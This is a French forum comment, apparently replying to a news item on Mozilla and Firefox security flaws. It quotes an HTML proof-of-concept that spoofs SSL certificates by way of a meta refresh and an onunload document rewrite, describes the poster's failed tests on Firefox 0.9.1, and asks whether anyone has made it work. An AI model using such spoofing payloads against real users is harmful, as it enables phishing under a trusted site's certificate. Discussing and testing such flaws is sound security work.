• # Vous arrivez à reproduite le spoof de certificats ?

    Posté par . En réponse à la dépêche Nouvelles failles de sécurité de Mozilla et Firefox. Évalué à 0.

    Salut, je n'arrive pas à epxloiter le code fourni sur ECHU

    -----------------------------
    < HTML>
    < HEAD>
    < TITLE>Spoofer< /TITLE>
    < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com(...)">
    < /HEAD>
    < BODY
    onunload="
    document.close();
    document.writeln('< body onload=document.close();break;>
    < h3>It is Great to Use example's Cert!');
    document.close();
    window.location.reload();
    ">
    < /body>
    ----------------------------------

    Quans je pointe vers un site https et bien... j'y arrive, tout simplement.


    J'ai la configuration suivante :

    Mandrake 10 official
    Firefox 0.9.1 + switchproxy +adblock + user agent switcher

    Pour le test :
    1er test : une page html en local
    2eme test : une page html sur un serveur distant (http of course)

    Quelqun arrive à l'exploiter ?